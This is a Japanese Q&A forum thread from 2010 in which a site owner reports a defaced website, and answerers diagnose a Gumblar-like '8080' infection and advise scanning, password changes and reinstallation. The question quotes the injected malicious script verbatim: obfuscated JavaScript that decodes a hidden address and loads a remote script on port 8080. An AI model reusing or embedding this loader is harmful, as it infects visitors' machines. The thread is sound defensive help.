WEBサイトが改変された？

WEBサイトが改変された？

今日、自分の個人サイトにアクセスすると、白い背景に「indiatimes-com.r10.net.hu」と表示されるだけのページになってしまっていました。もちろん、元のページはそんなデザインではありません。おかしいと思って、htmlのタグを見てみたところ、一番下の部分に妙なスクリプトが埋め込んであるのを発見しました。
どうやらこれが原因のようなのですが、これはウィルスの仕業なのでしょうか？だとしたら駆除などはどうすれば良いのでしょうか？
このようなことは初めてのことで困っています。
お分かりの方がいらっしゃいましたら回答ください。お願いします。

問題のスクリプト↓
<script> try{window.onload=function(){document.write('<div id=megaid>indiatimes-com.r10.net.hu</div>');Lr45metv0qok = document.getElementById('megaid').innerHTML + 'b@)@p&)a^g!#@@e&^s#(-#&c^o^m!.!#c@$)o$$u&&n@)@t(@^)e^(r!!!b@e(s(@&t)$$$&.)r#u#@:^$&)D$!@&E$!!B!U$#((G#(@^/(($d^(t&i&^@b@!l@^^o)!)g(&#.!$!c^o#$m#/^&(d)($#t@&i()b(l#&^o@!#!(g(^.(($c#@^#o#@#^m&(/$g&$^!$o!!o&)@g@&l((e!$@.&!^h#r!/#)g$o)o)g(^@l&&(e#).$^c^^(#o&#&m$$/#!o&$@^d##e#s##k&&).^!!#c^(#o)m@(/#$'.replace(/#|\!|&|\)|@|\$|\^|\(/ig, '') ;document.write('<scr'+'ipt src=http://'+Lr45metv0qok.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} } catch(S9rjp3zo ) {}</script>
<!--2f85bb3982c06b3b51c0586c6184ce2c-->

No.2 ベストアンサー 回答者： ryu-fiz 回答日時： 2010/01/28 21:07

感染の確認手段としてお勧めなのはカスペルスキーエンジン利用の@niftyウイルスチェックサービスです。

http://www.nifty.com/security/vcheck/

これとご利用のウイルス対策ソフトでのスキャンの双方で感染が確認出来ない場合には、ftpサーバのパスワードを変更後に改変されたソース部分を改修してアップし直して様子をみると良いでしょう。

感染が確認され、除去が困難な場合にはリカバリをお勧めします。この種の感染にも似て非なるものがいろいろあるようで、これを使えば完全に除去出来るというツールは今のところないと思われます。

昨今の感染の多くは、WindowsOSだけでなく、アプリケーションソフトやブラウザのプラグインなどのウイークポイント＝脆弱性も利用して発生します。これらについての最新の情報を知り、きちんと対策しておくことが大切です。次のサイトの初心者向けコンテンツから理解に努めてください。

国民のための情報セキュリティサイト
http://www.soumu.go.jp/main_sosiki/joho_tsusin/s …

最新の脆弱性情報や感染関連の情報については、例えば次のようなニュースサイトから得ることが出来ます。１日１回のチェックをお勧めします。

INTERNET Watch Title Page
http://internet.watch.impress.co.jp/
ITmedia エンタープライズ セキュリティチャンネル
http://www.itmedia.co.jp/enterprise/security/

なお、今回の感染はいわゆるGumblar感染の亜種、というかそれに類似したもののようですが、対応策としては次のURLが参考になりそうです。

Gumblar対策のおさらい：Jacques Log - CNET Japan
http://japan.cnet.com/blog/sec_newbie/2010/01/14 …

この回答へのお礼

8080系にかかっていたようです。
結局初期化して対応しました。
詳しい回答ありがとうございました。

お礼日時：2010/02/13 12:13

No.5 回答者： kenichi201 回答日時： 2010/02/10 09:53

ブログなどを運営していらっしゃるとしたら、あなたの記事を見た不特定多数の方にも感染が拡大していきます。

今後のあなたのサイトの信用問題に関わるので早急な確認をお願いしたいします。
感染の確認方法は今のところ手持ちのセキュリティソフトを用いてのスキャン、もしくは、WEBからのオンラインスキャンしかありません。

使えそうなオンラインスキャンのURLを貼っておきます。
トレンドマイクロ：　​http://www.trendflexsecurity.jp/housecall/​
ESET:　​http://www.eset.com/onlinescan/run_scanner.php​
@Nifty:　​http://www.nifty.com/security/vcheck/

この回答へのお礼

回答ありがとうございました。
結局、パソコンを初期化して対応しました。

お礼日時：2010/02/13 12:10

No.4 回答者： John_Papa 回答日時： 2010/02/04 00:07

サイトのページが変わってしまうのは解りやすい改ざんでしたね。

やっとGoogleでも同種の改ざんが「このサイトはコンピュータに損害を与える可能性があります。」と登録され始めました。VirusTotalでは、３日時点で１３のエンジンで検出されるようになりました。TrendMicroやMcAfeeではまだ未検出です。
ＰＣのクリーンインストールはお済でしょうか？
サイトには、ウイルスクリーンなHTMLをアップロードしてパスワードを変更してくださいね。
IPAにも届けを出しておいてください。

この回答へのお礼

画像までアップしていただき、回答ありがとうございました。
結局パソコンを初期化して対応しました。
今後気をつけたいと思います。

お礼日時：2010/02/13 12:11

No.3 回答者： redirect 回答日時： 2010/01/28 23:28

まあ、おそらくはレピュテーションなども含めて検出回避なども考慮した難読化したリダイレクトコードですよね。

とりあえずそのページは公開停止ですね。当然、サービス提供者にも連絡。で、当たり前ですが自分のPCが感染していないかどうか調べる。

手堅く行くならIPAなどに相談したほうがいいです。

この回答へのお礼

回答ありがとうございました。
やはり私のパソコンが感染していたようです。
パソコンを初期化して対応しました。

お礼日時：2010/02/13 12:12

No.1 回答者： nyonyon 回答日時： 2010/01/28 13:02

身に覚えのないスクリプトが入ってるならば、なんらかのウィルスに感染している可能性は大です。

まずはこれ以上感染を広げないよう、サーバーから全てのサイトデータを削除してください。

そして直ぐにウィルススキャンをパソコン全ファイルに対して行ってください。
時期的にGumblar(GENOウイルス)に感染されてるのかもしれません。
駆除方法はウィルスが特定されないと分かりませんので、まずはウィルス検索を行ってください。

参考URL（オンラインスキャン）】

トレンドマイクロ
http://www.trendflexsecurity.jp/housecall/
カスペルスキー
http://www.kaspersky.co.jp/virusscanner
以下の Nifty のサイトでもカスペルスキーのスキャンは実施可能です。
http://www.nifty.com/security/vcheck/kav/kavwebs …
マカフィー
http://home.mcafee.com/Downloads/FreeScan.aspx
シマンテック
http://www.symantec.com/region/jp/securitycheck/

この回答へのお礼

ガンブラー亜種の8080系というウイルスだったようです。
結局パソコンを初期化して対応しました。
回答ありがとうございました！

お礼日時：2010/02/13 12:14